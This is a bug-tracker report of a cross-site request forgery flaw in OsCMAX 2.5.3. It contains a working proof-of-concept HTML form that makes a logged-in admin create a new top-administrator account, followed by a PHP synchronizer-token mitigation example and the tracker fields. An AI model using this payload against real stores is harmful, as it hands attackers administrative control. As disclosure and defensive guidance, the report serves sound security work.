
CSRF add admin user

Description

Hello,
OsCMAX 2.5.3 suffers from a cross-site request forgery which allows the attacker to add a user.
CWE-352

<html>
  <form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
    <input type="hidden" name="admin_username" value="THETUNISIAN"/>
    <input type="hidden" name="admin_firstname" value="Moot3x"/>
    <input type="hidden" name="admin_lastname" value="Saad3x"/>
    <input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>
    <input type="hidden" name="admin_groups_id" value="1"/>
    <!-- About "admin_groups_id" -->
    <!-- 1= Top Administrator -->
    <!-- 2= Customer Service -->
    <input type='submit' name='Submit4' value="Agregar">
  </form>
</html>

The attacker can send a link to the admin, so an admin user will be created.
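The report above works because admin_members.php accepts any POST that carries a logged-in admin's session cookie, with nothing in the request that a third-party page could not forge. The standard mitigation is a synchronizer token: a per-session secret embedded in the legitimate form and required on every state-changing request. The following is an added example, not OsCMAX code; the function names, the hidden field name `csrf_token`, and the `$session` / `$post` arrays (stand-ins for `$_SESSION` and `$_POST` so the logic runs from the command line) are assumptions.

```php
<?php
// Added example: synchronizer-token CSRF protection for a state-changing
// admin action such as "member_new". Not OsCMAX code. $session and $post are
// hypothetical stand-ins for $_SESSION and $_POST so this runs without a
// web server.

declare(strict_types=1);

const CSRF_TOKEN_KEY = 'csrf_token'; // session slot holding the secret (assumed name)
const CSRF_FIELD     = 'csrf_token'; // hidden form field name (assumed name)

// Create the per-session token on first use and return it for embedding.
function csrf_issue_token(array &$session): string
{
    if (empty($session[CSRF_TOKEN_KEY])) {
        $session[CSRF_TOKEN_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_TOKEN_KEY];
}

// Hidden input the legitimate admin form must carry.
function csrf_hidden_field(array &$session): string
{
    $token = htmlspecialchars(csrf_issue_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="' . $token . '"/>';
}

// True only for a POST whose submitted token equals the session token.
// A page on another origin cannot read the victim's session token, so a
// forged form like the one in the report cannot supply a matching value.
// hash_equals() compares in constant time.
function csrf_verify(array $session, array $post, string $method): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session[CSRF_TOKEN_KEY] ?? '';
    $given    = $post[CSRF_FIELD] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);
}

// Run the privileged action only when the CSRF check passes.
function guarded_member_new(array $session, array $post, string $method, callable $action): string
{
    if (!csrf_verify($session, $post, $method)) {
        return '403 Forbidden: missing or invalid CSRF token';
    }
    return $action($post);
}

// --- demonstration with constructed data ---
$session = [];
$formField = csrf_hidden_field($session); // the real admin page renders this
$createMember = fn(array $p): string => 'created member ' . $p['admin_username'];

// 1. Cross-site POST in the shape of the report: no token is available to it.
$forged = ['admin_username' => 'constructed_user', 'admin_groups_id' => '1'];
echo guarded_member_new($session, $forged, 'POST', $createMember), PHP_EOL;

// 2. Same fields submitted from the legitimate form, which carries the token.
$legit = $forged + [CSRF_FIELD => $session[CSRF_TOKEN_KEY]];
echo guarded_member_new($session, $legit, 'POST', $createMember), PHP_EOL;
```

The token must be generated with a CSPRNG (`random_bytes`), stored server-side, and compared with `hash_equals`; rejecting non-POST methods closes the variant where the same handler is reachable through a GET link. Setting the session cookie with the `SameSite` attribute is a complementary browser-side control, but the server-side token check is the one that does not depend on client behaviour.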

Environment

Steps to reproduce

None

Status

Assignee

Michael Sasek

Reporter

g4k

Severity

Major

Components

Affects versions

v2.5.3

Priority